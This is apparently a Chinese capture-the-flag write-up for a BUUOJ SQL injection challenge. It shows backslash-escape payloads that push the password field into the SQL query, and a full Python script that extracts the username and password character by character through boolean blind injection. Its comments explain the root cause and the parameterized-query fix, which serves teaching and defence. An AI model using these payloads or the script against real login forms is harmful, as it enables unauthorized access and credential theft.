解题
访问hint.txt
username 处可以用反斜杠 \ 转义原本用来闭合的单引号,这样 password 的内容就落在字符串之外,被当作 SQL 语句解析;password 处使用整数型注入。根本原因是查询由字符串拼接而成,改用参数化查询即可修复。
username 传入 admin\,password 传入 or/**/length(database())>0#(条件为真)时,
页面会回显 stronger 字样。
username 传入 admin\,password 传入 or/**/length(database())<0#(条件为假)时,
页面会回显 girl friend 字样。
这两种回显可以作为布尔盲注的真/假判断依据,直接用脚本逐字符二分:
import requests
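# Boolean-based blind extraction against the challenge's login form.
#
# Why it works (per the write-up): the trailing backslash in the username
# escapes the quote that should close the username literal, so the string
# runs on to the password's opening quote and the password value is parsed
# as SQL. The root cause is a query assembled by string concatenation; a
# parameterized query removes it. Filtering keywords or whitespace does not:
# the payload already uses /**/ where a space would go (presumably because
# spaces are filtered -- confirm against hint.txt).
#
# What it looks like from the server side: each recovered character costs
# about seven POSTs to index.php whose password field differs only in two
# integers, which stands out in request logs and is easy to rate-limit.
url = "http://eeeed83e-4ab8-4328-adbd-e4caf8d13b84.node3.buuoj.cn/index.php"
data = {"username": "admin\\", "password": ""}
result = ""
i = 0  # 1-based character position handed to substr()
while True:
    i += 1
    # Binary search over printable ASCII; the loop narrows [head, tail]
    # until both ends meet on the character code at position i.
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#" % (i, mid)
        # payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
        data['password'] = payload
        # The original call had no timeout, so one stalled response would
        # block the script indefinitely.
        r = requests.post(url, data=data, timeout=10)
        # "stronger" is the page's response when the injected condition is
        # true; anything else is treated as false.
        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid
    # head still at 32 means every comparison came back false, i.e. the
    # position is past the end of the value (a literal space at this
    # position would end the loop early as well).
    if head == 32:
        break
    result += chr(head)
    # Progress output. The page lost its indentation, so the placement of
    # this print inside the loop is reconstructed; the last line printed is
    # the complete value either way.
    print(result)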